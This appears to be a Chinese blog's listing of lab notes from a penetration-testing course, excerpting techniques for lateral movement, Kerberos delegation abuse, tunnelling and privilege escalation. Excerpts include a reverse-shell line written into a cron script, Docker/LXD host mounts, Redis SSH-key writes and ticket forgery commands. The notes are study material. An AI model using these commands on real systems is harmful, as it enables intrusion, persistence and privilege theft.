- 博客(204)
- 收藏
- 关注
RSS订阅原创 DAY182内网渗透之内网对抗:横向移动篇&Kerberos&委派安全&非约束系&约束系&RBCD资源系&Spooler利用
简而言之,非约束委派是指用户账户将自身的TGT转发给服务账户使用。机器A(域控)访问具有非约束委派权限的机器B的服务,会把当前认证用户(域管用户)的TGT放在ST票据中,一起发送给机器B,机器B会把TGT存储在lsass进程中以备下次重用。委派是一种域内应用模式,是指将域内用户账户的权限委派给服务账号,服务账号因此能以用户的身份在域内展开活动(请求新的服务等),类似于租房中介房东的关系去理解。攻击者拿到了一台配置非约束委派的机器权限,可以诱导域管来访问该机器,然后得到管理员的TGT,从而模拟域管用户。
2025-01-13 18:53:13
916
原创 小迪安全-vpc5-内网攻防
哥斯拉上不能命令执行则可以在shiro中利用。Getsystem权限提升。heapdump信息泄露。套件尝试绕过横向移动。
2025-01-13 18:44:03
552
原创 内网攻防-小迪安全vpc4
写ssh密钥到author_keys中。对生成的木马bin文件混淆加密。接着直接使用ssh密钥登录。账号密码均为:kali。
2025-01-12 11:02:25
829
原创 内网攻防-小迪安全vpc3
三、链接目标服务器上的Redis服务,将保存的公钥1.txt写入Redis(使用redis-cli -h ip命令连接靶机,将文件写入)二、进入/root/.ssh目录: cd /root/.ssh , 讲生成的公钥保存到1.txt(名字随意)检查是否更改成功(查看有没有authorized_keys文件),没有问题就保存然后退出。更改Redis备份路径为ssh公钥存放目录(一般默认为/root/.ssh)一、在攻击机(redis客户端)中生成ssh公钥和私钥,密码设置为空。myssql数据库信息泄露。
2025-01-12 10:55:44
976
原创 DAY196-vpc1-小迪安全
相关帐号密码见虚拟机描述:例课程演示:vmware网卡设置:vmware8/NAT 对应192.168.139.0网段vmware2对应192.168.2.0网段vmware3对应192.168.3.0网段vmware10对应192.168.10.0网段记得开启里面的xampp和weblogic服务在做实验那么网络配置如下:配置NAT一块 + vmware2一块Windows 7配置vmware2Windows 10配置vmware2 + vmware3。
2025-01-02 10:51:54
1747
1
原创 DAY181红队内网攻防渗透:内网渗透之内网对抗:横向移动篇&PTH哈希&PTT票据&PTK密匙&Kerberoast攻击点&TGT&NTLM爆破
黑客可以使用有效的域用户的身份验证票证(TGT)去请求运行在服务器上的一个或多个目标服务的服务票证。请求的Kerberos服务票证的加密类型是RC4_HMAC_MD5,这意味着服务帐户的NTLM密码哈希用于加密服务票证。生成票据文件:shell ms14-068.exe -u webadmin@god.org -s S-1-5-21-1218902331-2157346161-1782232778-1132 -d 192.168.3.21 -p admin!我们可以导出这些票据,然后再导入票据,利用。
2025-01-02 10:40:46
1055
原创 DAY179内网渗透之内网对抗:横向移动篇&入口切换&SMB共享&WMI管道&DCOM组件&Impacket套件&CS插件
因此在内网渗透中,我们可以使用WMI进行横向移动,支持用户名明文或者hash的方式进行认证,并且该方法不会在目标日志系统留下痕迹。SMB服务通常由文件服务器提供,它允许客户端计算机通过网络访问服务器上的共享资源。通过SMB用户可以在网络上访问和共享文件夹、文件以及打印机,从而实现在不同计算机之间方便地共享数据和打印输出。它支持不同的两台机器上的组件间的通信,不论它们是运行在局域网、广域网、还是Internet上。、WMI服务开启,端口135,默认开启。2、横向移动篇-协议服务-命令模式、
2024-12-31 00:15:00
1384
原创 DAY180内网渗透之内网对抗:横向移动篇&WinRS命令&WinRM管理&RDP终端&密码喷射点&CrackMapExec
#45” --local-auth -x “whoami” #本地用户明文登录。如果端口开了,先使用ping 能ping通说明防火墙可能是关的,正向和反向都可以 如果是ping不通就是开的, 开的就要看winrm开没开开了可以使用icmp包装利用,没开winrm就不能利用。1、win之前利用需要手动开启winRM ,在win之后包括win的版本是默认开启的,、防火墙对5986、5985端口开放。主要参数:-u用户,-p密码,-H哈希值,-d指定域,-x执行命令。连接执行:通过winrs来执行远程命令。
2024-12-31 00:15:00
2097
原创 DAY178内网渗透之内网对抗:横向移动篇&入口差异&切换上线&IPC管道&AT&SC任务&Impacket套件&UI插件
需要使用目标系统用户的账,码,使用139、445端口。copy 1.bat \\xx.xx.xx.xx\C # 复制文件(注意:此命令中目标路径似乎有误,应为目录而非文件,可能是想表达将1.bat复制到对方的C共享目录)netusexx.xx.xx.xx\C\ /del # 删除IPC连接(注意:原命令中的“1.bat”应为误写,已更正为“/del”)注:上述文字中,"1.1.1.2.3"可能是一个错误的编号或者格式,根据上下文,它可能是不小心被包含在内的,真正的信息从"kerbrute枚举用户"开始。
2024-12-30 18:01:10
926
原创 DAY177内网对抗-信息收集篇&自动项目&本机导出&外部打点&域内通讯&Pillager&BloodHound
searchall64.exe browser -b 指定的浏览器或者all。searchall64.exe search -p 指定路径。FScan内网综合扫描工具,方便一键自动化、全方位漏扫扫描。适用于后渗透期间的信息收集工具,可以收集目标机器上敏感信息。3、信息收集篇-自动化工具项目-域内分析信息。中的有关敏感信息还有浏览器的账户密码。支持浏览器和各种工具的信息收集。
2024-12-30 17:13:26
864
原创 DAY176内网对抗-信息收集篇&SPN扫描&DC定位&角色区域定性&服务探针&安全防护&凭据获取
例如FTP服务器、E-Mail服务器及网站服务器等允许外部用户访问这些服务器,但不可能接触到存放在内网中的信息,就算黑客入侵DMZ 中服务器,也不会影响到公司内部网络安全,不允许任何外部网络的直接访问,实现内外网分离,在企业的信息安全防护加了一道屏障。扩大范围,利用域管理员可以登陆域中任何成员主机特性,定位出域管理员登陆过的主机IP,设法从域成员主机内存中dump出域管理员密码,进而拿下域控制器、渗透整个内网。通过域成员主机,定位出域控制器IP及域管理员账号,利用域成员主机作为跳板,
2024-12-30 17:10:37
1468
原创 DAY175内网对抗-隧道技术篇&防火墙组策略&FRP&NPS&Chisel&Socks代理&端口映射&C2上线
知识点:1、隧道技术篇-传输层-工具项目-Frp&Nps&Chisel2、隧道技术篇-传输层-端口转发&Socks建立&C2上线Frp是专注于内网穿透的高性能的反向代理应用,支持TCP、UDP、HTTP、HTTPS等多种协议。可以将内网服务以安全、便捷的方式通过具有公网IP节点的中转暴露到公网。项目下载:https://github.com/fatedier/frp下载下来有客户端和服务端两个不同文件,什么样的操作系统就下载对应的系统版本,但是工具的版本号最好要一致。
2024-12-29 01:45:00
872
原创 174内网对抗-隧道技术篇&防火墙组策略&HTTP反向&SSH转发&出网穿透&CrossC2&解决方案
iptables -A OUTPUT -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT /*允许从22端口进入的包返回*/iptables -A INPUT -p tcp -s 0/0 --dport 80 -j ACCEPT /*允许所有IP访问80端口*/iptables -A INPUT -p udp --sport 53 -j ACCEPT /* 域名解析端口,一般不开 */iptables -L /* 显示iptables列表 */
2024-12-29 01:00:00
1017
原创 DAY173内网对抗-隧道技术篇&防火墙组策略&ICMP&DNS&SMB协议&出网判断&C2上线&解决方案
ICMP 通过 PING 命令访问远程计算机,建立 ICMP 隧道,将 TCP/UDP 数据封装到 ICMP 的 PING 数据包中,从而穿过防火墙,防火墙一般不会屏蔽 PING 数据包,实现不受限制的访问。2、隧道技术篇-传输层-DNS协议-判断&封装&建立&穿透(可上线C2但不支持搭建socks代理)1、隧道技术篇-网络层-ICMP协议-判断&封装&建立&穿透(可上线C2并搭建socks代理)3、隧道技术篇-表示层-SMB协议-判断&封装&建立&穿透(需要口令横向移动上线C2)
2024-12-28 20:30:31
654
原创 DAY172内网对抗-网络通讯篇&防火墙组策略&入站和出站规则&单层双层&C2正反向上线&解决方案
关闭防火墙:netsh advfirewall set allprofiles state off。关闭防火墙:netsh advfirewall set allprofiles state off。开启防火墙:netsh advfirewall set allprofiles state on。开启防火墙:netsh advfirewall set allprofiles state on。开启防火墙:netsh advfirewall set allprofiles state on。
2024-12-28 20:24:24
1015
原创 DAY171内网对抗-代理通讯篇&不出网或不可达&SockS全协议&规则配置&C2正反向上线&解决方案
C2服务器是一个远程服务器,用于管理和控制受感染的计算机或设备。C2服务器通常被用于网络攻击活动中,攻击者通过C2服务器发送命令,控制受感染的设备进行恶意行为。(注意:socks代理是可以继承的,也就是说在windows2016上建立socks节点,会继承前面几台服务器上的socks节点)存在漏洞能直接上线C2服务器,就会涉及一个C2正反向上线问题。号在后面添加3的网段,因为这样2的网段也可以访问。1、代理隧道篇-代理通讯网络不可达-正反向连接上线。注意:配置连接IP为C2服务器IP。
2024-12-08 00:30:00
875
原创 DAY170内网对抗-基石框架篇&域树林&域森林架构&信任关系&多域成员层级&信息收集&环境搭建
例如一个公司进行兼并的时候,公司目前使用的域树xiaodi.org,被兼并公司存在自己的域树xiaodi8.org,在这种情况下就需要域树xiaodi.org和域树xiaodi8.org之间建立信任关系来构成域森林,通过信任管理建立,可以管理和使用整个域森林中的资源,在由域的特点特性保留着兼并公司自身原有特性。子域和父域就了解到,一个域管理员只能管理本域,不能访问管理其他域,如果需要互相访问则需要建立信任关系,信任关系就是连接不同域的桥梁,域树中的命名空间具有连续性,并且域名层次越深,级别越低。
2024-12-08 00:15:00
384
原创 DAY169内网对抗-基石框架篇&父域子域架构&GPO策略&成员层级&分域管理&信息收集&环境搭建
也扮演dns服务器角色,当然也可以专门有一台服务器扮演DNS角色)Web加入xiaodi.org。
2024-12-07 11:10:32
360
原创 DAY168内网对抗-基石框架篇&单域架构&域内应用控制&成员组成&用户策略&信息收集&环境搭建
域”是一个有安全边界的计算机组合(一个域中的用户无法访问另一个域中的资源),域内资源由一台域控制器(Domain Controller,DC)集中管理,用户名和密码是放在域控制器去验证的。• (必须是同一个域中的用户),只能在创建该全局组的域中添加用户和全局组,但可以在域森林中的任何域内指派权限,也可以嵌套在其他组中。域本地组无法嵌套在其他组中。父子域:类比公司总部和公司分部的关系,总部的域称为父域,各分部的域称为该域的子域。二、父子域在一个域中划分出多个域,被划分的域为父域,划分出来的域为子域。
2024-12-07 11:06:23
1358
原创 DAY142权限提升-Linux系统权限提升篇&Vulnhub&Rbash绕过&Docker&LXD容器&History泄漏&shell交互
lxc config device add test test disk source=/ path=/mnt/root recursive=true //挂载镜像磁盘,镜像的/mnt/root目录就是真实下的/目录。docker run -v /:/mnt -it alpine //利用docker起一个镜像并把真机的/目录挂载到镜像的/mnt目录。cat /home/tom/.mysql_history //泄露root密码。cd /mnt/root/root //进入目录提权。
2024-12-01 00:30:00
1246
原创 DAY143权限提升-Win系统权限提升篇&AD内网域控&NetLogon&ADCS&PAC&KDC&CVE漏洞
参考地址:https://cloud.tencent.com/developer/article/2097955。ms14-068.exe -u 域成员名@域名 -p 域成员密码 -s 域成员sid -d 域控制器地址。CVE-2020-1472是继MS17010之后好用的NetLogon特权域控提权漏洞,二、演示案例-WIN-AD域控提权-CVE-2020-1472。1.存在域,但当前用户不是域用户,提示说明权限不够。DC.xiaodi.local //域控名。2.存在域,并且当前用户是域用户。
2024-12-01 00:30:00
841
原创 DAY141权限提升-Linux系统权限提升篇&Vulnhub&Capability能力&LD_Preload加载&数据库等
cp /usr/share/exploitdb/exploits/linux/local/1518.c . //复制到当前所在文件夹。pty.spawn("/bin/bash")' //起一个交互式终端。/sbin/getcap -r / 2>/dev/null //查看所有能力。查看所有能力:getcap -r / 2>/dev/null。查看单个能力:getcap /usr/bin/php。删除能力:setcap -r /tmp/php。
2024-11-30 16:46:52
778
原创 DAY140权限提升-Linux系统权限提升篇&Vulnhub&PATH变量&NFS服务&Cron任务&配合SUID
echo "/bin/bash -i >& /dev/tcp/192.168.139.141/66 0>&1" >> /etc/script/CleaningScript.sh //把反弹shell命令写进这个文件里。find / -perm -u=s -type f 2>/dev/null //使用查看当前suid权限看看是否有/mnt/nfs/getroot文件。cd /mnt/nfs //目标机来到/mnt/nfs目录下。cat /etc/crontab //查看当前服务器的计划任务。
2024-11-30 16:43:28
940
原创 DAY139权限提升-Linux系统权限提升篇&Vulnhub&辅助项目&SUID权限&SUDO指令&版本漏洞
在Linux/Unix中,当一个程序运行的时候,程序将从登录用户处继承权限。SUID被定义为给予一个用户临时的(程序/文件)所有者的权限来运行一个程序/文件。用户在执行程序/文件/命令的时候,将获取文件所有者的权限以及所有者的UID和GID。SUDO权限是root把本来只能超级用户执行的命令赋予普通用户执行,系统管理员集中的管理用户使用权限和使用主机,配置文件:/etc/sudoers,除此配置之外的问题,SUDO还有两个CVE漏洞(CVE-2019-14287 CVE-2021-3156)。
2024-11-28 11:08:46
1299
原创 DAY138权限提升-Linux系统权限提升篇&内核溢出&辅助项目&Vulnhub&Dirty Pipe&Pwnkit&dirtycow
pty.spawn("/bin/bash")' //利用python起一个shell终端,该脏牛漏洞需要起一个终端才行。https://github.com/The-Z-Labs/linux-exploit-suggester(常用 ./sh文件)https://github.com/belane/linux-soft-exploit-suggester(py文件)https://github.com/jondonas/linux-exploit-suggester-2(pl文件)
2024-11-28 11:04:50
721
原创 DAY137权限提升-Win系统权限提升篇&计算机用户&UAC绕过&DLL劫持&未引号路径
原理:Windows应用程序启动的时候需要DLL。use exploit/windows/local/bypassuac_silentcleanup //针对新版本的win10/win11等。use exploit/windows/local/bypassuac_sluihijack //针对新版本的win10/win11等。use exploit/windows/local/bypassua //针对旧版本的win7。信息收集-进程调试-制作dll并上传-替换dll-等待管理员启动应用成功。
2024-11-27 10:20:28
1020
原创 DAY136权限提升-Win系统权限提升篇&计算机管理用户&进程注入&令牌窃取&服务启动&远程控制
而system权限是可以用(服务启动&远程控制、进程注入&令牌窃取等方法)降权到administrator、user权限的。普通用户是没办法用(服务启动&远程控制、进程注入&令牌窃取等方法)提权到administrator、system权限的。适用版本:windows 7、10、08、12、16、19、22,早期用at命令。3、计算机管理用户到System-进程注入&令牌窃取。steal_token PID //窃取进程令牌。spawnu PID //窃取进程令牌上线。当前受控机在内网域环境。
2024-11-27 10:13:42
678
原创 DAY135权限提升-系统权限提升篇&数据库提权&Postsql&Redis&第三方软件提权&密码凭据&钓鱼文件
远控类:Teamviewer 向日葵 Todesk VNC Radmin等。技术:写密钥ssh 计划任务 反弹shell CVE2022沙盒执行。密码类:各大浏览器 Xshell Navicat 3389 等。1、通过普通用户或Web用户收集或提取有价值凭据进行提升。服务类:FileZilla Serv-u Zend等。技术:CVE-2019-9193 UDF libc。文档类:Winrar WPS Office等。条件:利用未授权或密码连接后执行。条件:数据库用户密码。
2024-11-27 10:05:02
790
原创 DAY134权限提升-Windows权限提升篇&数据库篇&MYSQL&MSSQL&ORACLE&自动化项目
条件:ROOT密码(高版本的-secure-file-priv没有进行目录限制,如果进行了目录限制就会导致提权失败)-利用已知Web权限建立代理节点,然后自动化提权项目在连接这个代理节点(等同于本地连接)Oracle:(站库分离,非JSP,直接数据库到系统等)-利用已知权限执行SQL开启外联(让数据库支持外联)MSSQL:.NET+MSSQL 以web入口提权。3、Web到Win-数据库提权-Oracle。1、Web到Win-数据库提权-MSSQL。2、Web到Win-数据库提权-MYSQL。
2024-11-26 20:03:20
1206
2
原创 DAY133权限提升-Windows权限提升篇&溢出漏洞&土豆家族&通杀全系&补丁对比&EXP筛选
参考地址:https://mp.weixin.qq.com/s/OW4ybuqtErh_ovkTWLSr8w。解决工具或插件无法实时更新,又或者面对的操作系统较高的情况下人工操作更适合。土豆(potato)提权通常用在我们获取WEB/数据库权限的时候,windows提权用这个系列漏洞最多,成功率也最大。1、Web到Win-系统提权-土豆家族。2、Web到Win-系统提权-人工操作。1、Web权限提升及转移。2、系统权限提升及转移。3、宿主权限提升及转移。4、域控权限提升及转移。1、内核溢出漏洞提权。
2024-11-26 20:00:03
781
原创 DAY132权限提升-Windows权限提升篇&溢出漏洞&宝塔面板Bypass&CS插件化&MSF模块化
如果使用集成软件搭建的网站被人拿下,那么别人拿到的权限就是运行集成软件当前用户的权限,一般都是administrator,由于使用宝塔的人多了,现在通过宝塔搭建的网站拿到webshell后,宝塔自身安全策略会导致有些命令执行不了的情况。Power Users:高级用户组,拥有比一般用户更高的系统权限,但比管理员组权限低。System:系统组,拥有管理系统资源的权限,包括文件、目录和注册表等。Users:用户组,一般用户的默认组别,拥有较低的系统权限。root用户:UID为0,拥有系统的完全控制权限。
2024-11-25 20:14:47
554
原创 DAY131权限提升-Web权限提升篇&划分获取&资产服务&后台系统&数据库管理&相互转移
计算机系统权限:系统内核漏洞,钓鱼后门攻击,主机软件安全直达或上述权限提升造成。宿主机权限:Docker不安全配置或漏洞权限提升直达(服务资产造成入口后提升)Web权限:源码查看,源码文件增删改查,磁盘文件文件夹查看(以权限配置为主)数据库权限:SQL注入,数据库泄漏,弱口令攻击,未授权访问等造成。数据库权限:操作数据库的权限,数据增删改查等(以数据库用户为主)后台权限:SQL注入,数据库泄漏,弱口令攻击,未授权访问等造成。后台权限:文章管理,站点管理,模版管理,数据管理,上传管理等。
2024-11-25 20:12:06
687
原创 DAY119-代码审计&JAVAEE开发篇&身份验证鉴权逻辑&过滤器&拦截器&shiro框架&JWT技术
admin或session为空有一个符合跳转登录//admin绕过鉴权审计核心代码requestUrl!Url要包含地址/login.html或/register.html绕过当你访问这个项目的url时候,会有拦截功能,也就是不可以随意地去访问项目的url,拦截后的请求会被重定向到开始的登录界面。
2024-11-16 16:49:16
440
原创 DAY120java审计第三方组件&依赖库挖掘&Fastjson&Shiro&Log4j&H2DB
originalFileName从file.getOriginalFilename获取文件名。logger.error,logger.info函数触发。session不可控。
2024-11-16 16:48:54
1056
原创 DAY118代码审计-JAVAEE开发&文件上传&文件读取&文件下载&文件删除
数据库导入配置文件Maven环境配置进入后台拿用户账号密码Md5查看密码。
2024-11-16 16:29:05
506
原创 DAY117代码审计-javaee开发篇&jdbc拼接&mybatis查询&fibernate模型
Maven设置看这篇文章配置本地tomcat配置部署gongjian未说明未使用mybatis和hibernate追踪变量orderBygetBaseForm().getOrderBy()是否可控,和是否过滤参数追踪到一个私有属性利用链分析触发list方法找到路由地址参数Sql语句测试成功配置sql安装外部库用法导致的sql注入漏洞Sql语句在xml配置文件中查找sortMyNotice查找可控变量baseKey。
2024-11-16 16:18:11
1246
原创 DAY113代码审计-PHP&TP框架&微P系统&漏审项目等
对file\_get\_contents函数后面的括号进行了正则过滤。禁止了assert函数对eval函数后面的括号进行了正则过滤。1、Good.php的不安全写法。1、5.x全版本的sql漏洞。6、验证登录token值固定。waf对eval进行了拦截。
2024-11-14 08:08:09
1180
原创 DAY112代码审计PHP开发框架&POP链利用&Yii反序列化&POP利用链
1、路由关系2、漏洞触发口unserialize(base64_decode($data));2、__destruct(),魔术法方法调用close函数方法3、未找到利用链,尝试__call魔术方法4、逆推找函数5、动态调试。
2024-11-14 08:04:49
842
原创 DAY111PHP开发框架&THIKNPHP&反序列化&POP利用链&RCE执行&文件删除
函数方法file_exists,@unlink($filename);//$relation可控,找到一个没有visible方法或不可访问这个方法的类时,即可调用_call()魔法方法。1、__destruct发现调用$this->removeFiles();4、逆向分析call_user_func。2、__toString利用链分析。1、文件删除poc-》rce利用。4、pop文件删除利用链的使用。5、input方法触发分析。3、call利用链分析。7、call方法调用了。8、利用链不会xie。
2024-11-12 11:47:51
1007
原创 DAY110代码审计-PHP框架开发篇&ThinkPHP&版本缺陷&不安全写法&路由访问&利用链
文件:application/bbs/controller/User.php。文件:application/bbs/controller/User.php。问题在where语句是直接拼接SQL-where("id ={$id}")1、查看版本-thinkphp/base.php(搜version找)如改为数组的传参就能修复此处问题-where("id",$id)2、PHP框架审计-ThinkPHP-不安全写法&版本漏洞。学习-ThinkPHP-架构&调试&路由&接受。满足条件:对应的函数点和可控变量。
2024-11-12 11:43:49
1223
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人